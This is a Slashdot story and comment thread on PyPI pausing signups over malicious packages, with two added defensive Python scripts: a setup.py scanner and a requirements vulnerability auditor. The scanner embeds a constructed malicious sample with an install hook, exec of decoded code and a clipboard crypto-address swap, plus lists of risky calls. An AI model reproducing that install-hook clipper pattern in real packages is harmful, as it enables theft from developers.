source link: https://developers.slashdot.org/story/23/05/21/2340220/pythons-pypi-package-repository-temporarily-halted-new-signups-citing-volume-of-malicious-projects

Python's PyPi Package Repository Temporarily Halted New Signups, Citing 'Volume of Malicious Projects'


On Saturday PyPI, the official third-party registry of open source Python packages, "temporarily suspended new users from signing up, and new projects from being uploaded to the platform" reports BleepingComputer.

"The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave," stated an incident notice posted by PyPI admins Saturday.

Hours ago they posted a four-word update: "Suspension has been lifted." No details were provided, but The Hacker News writes the incident "comes as software registries such as PyPI have proven time and time again to be a popular target for attackers looking to poison the software supply chain and compromise developer environments."

Earlier this week, Israeli cybersecurity startup Phylum uncovered an active malware campaign that leverages OpenAI ChatGPT-themed lures to bait developers into downloading a malicious Python module capable of stealing clipboard content in order to hijack cryptocurrency transactions. ReversingLabs, in a similar discovery, identified multiple npm packages named nodejs-encrypt-agent and nodejs-cookie-proxy-agent in the npm repository that drops a trojan called TurkoRat.
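The two behaviours the article attributes to the malicious uploads (code that runs at `pip install` time, and clipboard access used to swap cryptocurrency addresses) can be triaged statically before a package is ever installed. The script below is an added example, not code from PyPI, BleepingComputer, Phylum or ReversingLabs; both `setup.py` samples it scans are constructed for the demo, and the lists of clipboard modules, risky calls and address-regex fragments are assumptions chosen for illustration.

```python
"""Heuristic triage of a Python package's setup.py (added example).

Illustrative static check for two signals associated with malicious uploads:
code that runs at `pip install` time (install-hook overrides) and clipboard
access paired with cryptocurrency-address patterns (a "clipper"). Heuristics
only: a hit is a reason to look, not proof of malice.
"""
import ast

# Assumption: short, non-exhaustive lists of clipboard modules and of calls
# that are unusual inside a setup script.
CLIPBOARD_MODULES = {"pyperclip", "pyclip", "clipboard", "win32clipboard"}
RISKY_CALLS = {"exec", "eval", "system", "Popen", "b64decode", "urlopen"}
# Assumption: simplified fragments of common BTC/ETH address regexes.
ADDRESS_PATTERN_FRAGMENTS = ("bc1[", "[13][", "0x[a-fA-F0-9]{40}")


def triage_source(src: str) -> dict:
    """Parse `src` with the ast module and report the heuristics it trips."""
    tree = ast.parse(src)
    imports, calls, install_hook = set(), set(), False
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if name in RISKY_CALLS:
                calls.add(name)
            # setup(..., cmdclass={...}) replaces the install/develop commands
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                install_hook = True
        elif isinstance(node, ast.ClassDef):
            # class X(install): ... where install is setuptools.command.install
            for base in node.bases:
                if getattr(base, "id", None) == "install" or getattr(base, "attr", None) == "install":
                    install_hook = True

    findings = []
    if install_hook:
        findings.append("install-time hook: custom cmdclass/install subclass runs during pip install")
    if calls:
        findings.append("risky calls: " + ", ".join(sorted(calls)))
    clipboard = bool(imports & CLIPBOARD_MODULES)
    address_pattern = any(frag in src for frag in ADDRESS_PATTERN_FRAGMENTS)
    if clipboard and address_pattern:
        findings.append("clipper behaviour: clipboard access combined with crypto-address regex")
    elif clipboard:
        findings.append("clipboard access in a setup script")
    return {"imports": sorted(imports), "findings": findings, "suspicious": bool(findings)}


# Constructed samples for the demo (not real packages).
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="demo-utils", version="1.0.0", packages=find_packages())
'''

SUSPICIOUS_SETUP = '''
import re, base64
import pyperclip
from setuptools import setup
from setuptools.command.install import install

BTC = re.compile(r"^(bc1[a-z0-9]{25,39}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$")

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("cHJpbnQoJ2hpJyk="))   # decodes to print('hi')
        if BTC.match(pyperclip.paste()):
            pyperclip.copy("bc1qdemoattackeraddress")  # swap the victim's address

setup(name="demo-chatgpt-helper", version="0.1", cmdclass={"install": PostInstall})
'''


def run_demo() -> dict:
    """Triage both constructed samples."""
    return {"benign": triage_source(BENIGN_SETUP), "suspicious": triage_source(SUSPICIOUS_SETUP)}


if __name__ == "__main__":
    for label, result in run_demo().items():
        print(label, "->", "SUSPICIOUS" if result["suspicious"] else "clean")
        for finding in result["findings"]:
            print("   ", finding)
```

The check never executes the package: it only parses the source, so it is safe to run over an untrusted sdist. The useful signal is the combination of an install hook with decoding or clipboard calls, which a legitimate `setup.py` almost never needs.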

I never really got the appeal of these "package managers" that are language specific. Too much proprietary tech constantly trying to re-invent the wheel.

In all my projects, I just use Git submodules. It is language and OS agnostic. If I need to make changes and fix bugs in any of the modules, I already have an easy way to commit them back upstream. I don't need to worry about malicious code in repositories, because it's all decentralized. If someone else clones my repo, they're cloning the exact git commit hash.

  • You've clearly not worked in projects with many dependencies and each dependency having their own set of dependencies. Git submodules require you to manage everything of every other submodule by hand. How do you deal with vulnerabilities within specific versions? What about conflicts between 2 projects? Submodules were never intended for what you use them for.
    • Re:

      Sounds like a terrible design.

      • More like don't reinvent the wheel, sure you can write it all yourself, and if you are working inside a massive multinational or high security/risk environment you probably should, but go tell a client that the software he wants costs 10x more, let's see how many projects you'll be allowed to build.
    • Re:

      The whole system is a mess. It's like people have never heard of a stable API. Public repos are rarely policed properly either, both for malware and for automated testing. It wouldn't be hard to have PyPi require a decent test suite and builds that pass it, especially for popular projects where breakage will cause a lot of problems.

  • Re:

    Having a broad variety of open source tools, some of which are _the_ reference tool, is useful. It happened with Perl, and Java, and is being tried with Flatpaks and golang and Rust. There are problems: ridiculous chains of unreliable and unpredictably incompatible dependencies are one of the risks we've seen with all of these packaging systems. Each language feels the need to re-invent the wheel because they drive on slightly different roads.

      • Re:

        Like all the replacements for "old" tools that were just fine for decades. Traceroute, nslookup, ifconfig, etc etc. Tell me again why nslookup was retired and moved to legacy support?

        • Re:

          Because nslookup is architecturally flawed. It doesn't use BIND for lookups but a separate library and algorithm and makes queries not inquired about and can give errors in unexpected ways and can fail in ways that can give misleading or incorrect errors and is semi useless for diagnosing local issues as it steps around the local system and then makes queries that are semi nonsensical that sort of made sense back when internet connections were generally intermittent and UUCP was a common way to communica

      • Re:

        It's because they have looked at what has gone before and realized how bad it is and thought "well, even if my new package manager is garbage at least my new package manager won't have these problems all of the other ones have"

        Of the last 20 software projects I had some responsibility for securing they averaged just over 1,000 external dependencies per project. The fact that modern package managers even semi support this is both amazing and terrifying. There are real issues in trying to maintain the secu

  • Re:

    I never really got the appeal of these "package managers" that are language specific. Too much proprietary tech constantly trying to re-invent the wheel.

    Let me count the ways.

    1) Hackers are constantly prying into libraries looking for vulnerabilities. You are not a security expert, you didn't write the code and you probably don't have time to inspect the entire codebase (especially if it's a big one). Modern dependency management gives you access to tools to ensure you're notified when vulnerabilities are found in
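The question raised earlier in the thread (how a project knows which of its exact pinned versions are affected by a published vulnerability) is what lockfile-based package managers answer with an advisory lookup. The script below is an added example, not code from any commenter, from pip or from PyPI: it audits a constructed `requirements.txt` against a constructed advisory list in the OSV "introduced/fixed" style, and also reports dependencies that are unpinned or pinned without a content hash. The package names, advisory IDs and hash are all made up for the demo, and versions are treated as plain dotted integers, a deliberate simplification of PEP 440.

```python
"""Audit pinned requirements against an advisory list (added example).

Constructed advisories and lock file; simplified version scheme (assumption:
plain dotted integers, not full PEP 440). Reports three things a package
manager can tell you that a hand-managed vendor tree cannot: known-vulnerable
pinned versions, requirements that are not pinned at all, and pinned
requirements with no hash to verify the downloaded artifact against.
"""
import re

REQUIREMENT_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|>=|<=|~=|!=|>|<)?\s*([^\s;,]+)?")


def normalize(name: str) -> str:
    """PyPI treats Demo_YAML, demo.yaml and demo-yaml as the same project."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(version: str) -> tuple:
    """'2.30.1' -> (2, 30, 1); trailing zeros dropped so 1.0 == 1.0.0."""
    parts = []
    for piece in version.split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    while parts and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def version_in_range(version, introduced, fixed) -> bool:
    """OSV-style event range: introduced <= version < fixed (fixed None = unfixed)."""
    v = parse_version(version)
    if v < parse_version(introduced):
        return False
    return fixed is None or v < parse_version(fixed)


def parse_requirements(text: str) -> dict:
    """Return {name: {"version": str or None, "hashed": bool}} per requirement line."""
    reqs = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("-"):     # skip blanks and options like -r / --index-url
            continue
        tokens = line.split()
        match = REQUIREMENT_RE.match(tokens[0])
        if not match:
            continue
        name, op, version = match.groups()
        pinned = op == "==" and version is not None
        reqs[normalize(name)] = {
            "version": version if pinned else None,
            "hashed": any(t.startswith("--hash=") for t in tokens[1:]),
        }
    return reqs


def audit(requirements_text: str, advisories: list) -> dict:
    """Match every pinned requirement against the advisory list."""
    report = {"vulnerable": [], "unpinned": [], "unhashed": []}
    for name, info in parse_requirements(requirements_text).items():
        if info["version"] is None:
            report["unpinned"].append(name)
            continue
        if not info["hashed"]:
            report["unhashed"].append(name)
        for adv in advisories:
            if normalize(adv["package"]) == name and version_in_range(
                info["version"], adv["introduced"], adv.get("fixed")
            ):
                report["vulnerable"].append((name, info["version"], adv["id"]))
    return report


# Constructed advisory feed and lock file (demo data, not real packages or CVEs).
ADVISORIES = [
    {"id": "DEMO-2023-0001", "package": "demo-http", "introduced": "2.0.0", "fixed": "2.31.0"},
    {"id": "DEMO-2023-0002", "package": "demo-yaml", "introduced": "5.1", "fixed": None},
    {"id": "DEMO-2023-0003", "package": "demo-crypto", "introduced": "1.0", "fixed": "1.4.0"},
]

REQUIREMENTS = """\
# constructed lock file
demo-http==2.30.1 --hash=sha256:5f4dcc3b5aa765d61d8327deb882cf992b2d8d4f8d5f9ee21a5d0c7b7c8e9f10
Demo_YAML==6.0
demo-crypto==1.4.2
demo-logging>=3.0   # not pinned on purpose
"""


def run_demo() -> dict:
    """Audit the constructed lock file against the constructed advisories."""
    return audit(REQUIREMENTS, ADVISORIES)


if __name__ == "__main__":
    for key, items in run_demo().items():
        print(key + ":", items)
```

With `pip install --require-hashes -r requirements.txt`, every line must carry a `--hash=` entry, which is the package-manager equivalent of cloning an exact commit: the artifact is rejected if its content changes, regardless of what the index serves.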
